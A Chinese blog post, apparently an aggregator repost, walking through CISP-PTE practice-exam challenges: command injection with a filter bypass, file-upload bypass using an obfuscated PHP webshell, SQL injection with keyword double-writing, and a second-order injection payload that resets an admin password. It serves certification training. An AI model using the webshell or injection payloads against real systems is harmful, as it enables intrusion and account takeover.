记一些CISP-PTE题目解析

news/2024/9/28 11:19:54

0x01 命令执行

直接payload: 127.0.0.1 &whoami,发现可以成功执行whoami命令

然后ls ../ ,发现有个key.php文件

尝试用cat命令查看发现不行被拦截了。(其实题目过滤了常用的查看文件的命令)

这里有两种思路,第一种是根据题目意思用命令执行写webshell的方式去进行getshell,第二种方式则是使用linux的命令进行绕过。这里采用第二种方式使用c''at的方式进行绕过。

0x02 基础题目之文件上传突破

可以发现部分上传代码,文件名被命名成一个随机数加上原本的文件名然后md5的值。

直接上传一个带图片头的php木马(会检测是否是图片,所以需要一个GIF89A当图片头),而且过滤了一些敏感函数如eval等。这里直接上传一个免杀的木马即可。

<?php
function go()
{
$func1 = chr(97) . chr(115) . chr(115) . chr(101) . chr(114) .
chr(116);
return $func1;
}
$func1 = go();
$array1 = array($_GET['cmd']);
array_map($func1, $func1 = $array1);
?>

然后接下来就是爆破出shell的地址了,这里我们直接把上传的数据包重放1000次用来提高爆破成功的效率。

【----帮助网安学习,以下所有学习资料免费领!加vx:dctintin,备注 “博客园” 获取!】

 ① 网安学习成长路径思维导图
 ② 60+网安经典常用工具包
 ③ 100+SRC漏洞分析报告
 ④ 150+网安攻防实战技术电子书
 ⑤ 最权威CISSP 认证考试指南+题库
 ⑥ 超1800页CTF实战技巧手册
 ⑦ 最新网安大厂面试题合集(含答案)
 ⑧ APP客户端安全检测指南(安卓+IOS)

用burp的null payload发送1000次

然后设置上传的文件名1.php为前缀,加上随机数的1~99999,最后经过md5加密即可。

设置前缀为1.php (上传的文件名)

然后添加md5

最后就是等待爆破成功。

key在web根目录下的key.php文件

0x03 基础题目之流量分析

下载数据包,使用wireshark发现是http协议居多,首先可以使用wireshark的导出文件查看一下http的访问文件分组。

可以发现攻击者在进行目录爆破。这里可以直接选择

然后根据文件大小排序一下,发现其中有一个压缩包。

但是压缩包设置了密码

然后查找http数据中是否有包含压缩包名字的数据包,其中phpspy.php包含了这个压缩包的名称。

追踪流结果发现Adm1n!是解压密码(%21是url编码)

0x04 代码审计

考点就是让数字绕过is_numerice判断,这里直接使用数字后面跟一个字符串即可绕过。

0x05 基础题目之SQL注入

首先发现题目有一个注册界面,注册账号之后进行登录。

然后再发表文章处发现存在insert注入。

直接抓取数据包使用sqlmap即可

0x06 基础题目之SQL注入

没什么特别的,只是过滤了union关键字这里用双写绕过就可以了, ununionion这样。

然后直接load_file读取文件即可获取key。

0x07 无回显命令执行

很简单,看了一下代码,限制了cmd参数的命令长度而已。可以使用linux的流符号生成一个文件

0x08 二阶SQL注入

二次注入是一种SQL注入攻击的形式,它涉及到用户输入的数据在第一次被存储到数据库中时被错误地处理,导致在后续的查询中,这些原本被转义的数据再次被使用,从而执行恶意命令。

第一步是插入恶意数据:

在第一次插入数据时,开发者可能使用了函数如addslashes过滤了,这时是没有问题的。

比如注册功能:

这里注册一个test'用户 ,由于'被成功转义成了'所以这里是能够正常执行sql语句的。

然后登录test'用户也是没有问题的

但是问题出现再第二次数据库操作中,由于被存入的数据库的用户名是test',那么在第二次系统从数据库中获取用户名的时候如果没有过滤那么就会造成二次注入。

比如更新密码:

系统的语句可能会长这样:

update user set passwd = 'newpasswd' where uname = 'test'' #test'是用户名。那么这种情况就可能导致注入。

那么二次注入怎么利用,这里可以看到需要admin用户登录才能够得到key,那么我们能够用构造一条语重置admin密码就可以了

update user set passwd = 'newpasswd' where uname = 'aaa' or 1 --a'

aaa' or 1 -- a是用户名

用新用户重置admin的密码

再次登录admin

更多网安技能的在线实操练习,请点击这里>>

  

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.ryyt.cn/news/30280.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈,一经查实,立即删除!

相关文章

助听器降噪神经网络模型

具体的软硬件实现点击 http://mcu-ai.com/ MCU-AI技术网页_MCU-AI人工智能 本文介绍了一种用于实时语音增强的双信号变换 LSTM 网络 (DTLN),作为深度噪声抑制挑战 (DNS-Challenge) 的一部分。该方法将短时傅立叶变换 (STFT) 和学习分析和综合基础结合在堆栈网络方法中,参数少…

在 WPF 中集成 ASP.NET Core 和 WebView2 用于集成 SPA 应用

背景 我们有些工具在 Web 版中已经有了很好的实践,而在 WPF 中重新开发也是一种费时费力的操作,那么直接集成则是最省事省力的方法了。 修改项目文件 我们首先修改项目文件,让 WPF 项目可以包含 ASP.NET Core 的库,以及引用 WebView2 控件。 <Project Sdk="Microso…

【湿地探秘】守护蓝色星球的绿色之肾

在地球的广阔画卷中,湿地犹如镶嵌其中的翡翠,不仅孕育着丰富的生物多样性,更是自然界不可或缺的调节器。今天,让我们一同深入了解湿地的基本概念、我国湿地的概貌、湿地的多样类型,以及保护湿地对于人类和地球的深远意义。湿地的基本概念湿地,被誉为“地球之肾”,是地球…

云效 Pipeline as Code 来了!这些场景,用好它效率翻倍!

提到 YAML,不少同学首先想到的是使用门槛。云效 Flow 内置了丰富的 YAML 模板以及 YAML 手册,支持 YAML 语法自动补齐、实时校验并推荐修复方案,以及多种快捷键操作等,旨在帮助开发者降低 YAML 使用门槛,提升 YAML 编写效率。从可视化编排到支持 YAML 编排 云效流水线 Flo…

递归+回溯解决有效括号问题

题目描述: 数字 n 代表生成括号的对数,请你设计一个函数,用于能够生成所有可能的并且 有效的 括号组合 例如:当n=1 时,有效的括号组合[()]当n=2时,有效的括号组合[(()),()()]当n=3时,有效的括号组合有[((())),(()()),(())().()(()),()()()]解题思路:先递归生成n个左括号…

正义使者其二

大赢特赢,最正义的一集!\(\Huge{还有体活\,赢!}\)

..\HAL_LIB\Inc\stm32l4xx_hal_rcc_ex.h(2424): error: #20: identifier HAL_StatusTypeDef is undefined

stm32工程编译时遇到这个错误,显示HAL_StatusTypeDef没有被定义,但是go to definition又能找到定义 后来在网上寻找解决办法,结果发现竟然是 #include "stm32l4xx_hal_spi.h"#include "stm32l4xx_hal.h" 这两个的顺序问题,#include "stm32l4xx_h…

LOTO示波器动作编程功能(命令批处理)

动作编程功能是为了方便客户根据自己的应用场景,做到一个按键就连续做多个示波器操作,从而降低了对操作人员的技术要求,做到傻瓜式操作。之前LOTO有个类似的功能,是把示波器的基础设置根据不同的测试场景存成不同的设置文件,需要时可以选择合适的场景设置导入进来这个设置…